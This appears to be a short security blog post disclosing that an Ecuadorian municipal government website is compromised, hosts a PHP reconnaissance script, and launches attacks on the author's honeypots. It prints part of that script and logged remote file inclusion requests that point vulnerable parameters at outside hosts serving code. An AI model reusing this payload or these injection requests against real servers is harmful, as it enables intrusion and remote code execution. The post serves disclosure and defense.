Ecuador Government site hacked and spreading malware

Colombia, Venezuela and now Ecuador. How far are we from reporting the whole South America?

The web site from the ‘Municipio del Cantón Mejía’ in Ecuador has been hosting malware and also attacking our honeypots for a while. As always, we reported and didn’t hear anything back.

They are hosting the common FX29ID php exploit:

http://www.municipiodemejia.gov.ec/administrator/components/com_search/sken/id1(feelcomz).txt

< ? php
##[ Fxxxx ]##
fx(“ID”,”FeeL”.”CoMz”);
$P = @getcwd();
$IP = @getenv(“SERVER_ADDR”);
$UID = fx29exec(“id”);
fx(“SAFE”,@safemode()?”ON”:”OFF”);
fx(“OS”,@PHP_OS);
fx(“UNAME”,@php_uname());
fx(“SERVER”,($IP)?$IP:”-“);
fx(“USER”,@get_current_user());
fx(“UID”,($UID)?$UID:”uid=”.@getmyuid().” gid=”.@getmygid());
fx(“DIR”,$P);
fx(“PERM”,(@is_writable($P))?”[W]”:”[R]”);
fx(“HDD”,”Used: “.hdd(“used”).” Free: “.hdd(“free”).” Total: “.hdd(“total”));
fx(“DISFUNC”,@getdisfunc());
##[ FX29SHEXEC ]##

Also attempting RFI attacks against our systems (190.152.217.250 is their IP address):

SCAN:190.152.217.250 /xxx/new-visitor.inc.php?lvc_include_dir=http://www.j8design.com/id1.txt?
190.152.217.250 /xxx/show.php?path= http://kucing1.fileave.com/id1.txt?
190.152.217.250 //?_SERVER[DOCUMENT_ROOT]= http://clompunk.webs.com/id1.txt?
190.152.217.250 //bbs///skin/buzzard_espoon/setup.php?dir= http://www.hyonsvc.co.kr//bbs//icon/id1.txt????????
190.152.217.250 //delete_comment.php?board_skin_path= http://www.hyonsvc.co.kr//bbs//icon/id1.txt

If you know anyone at the Ecuador .gov, let them know about it. Hopefully they will get it fixed soon.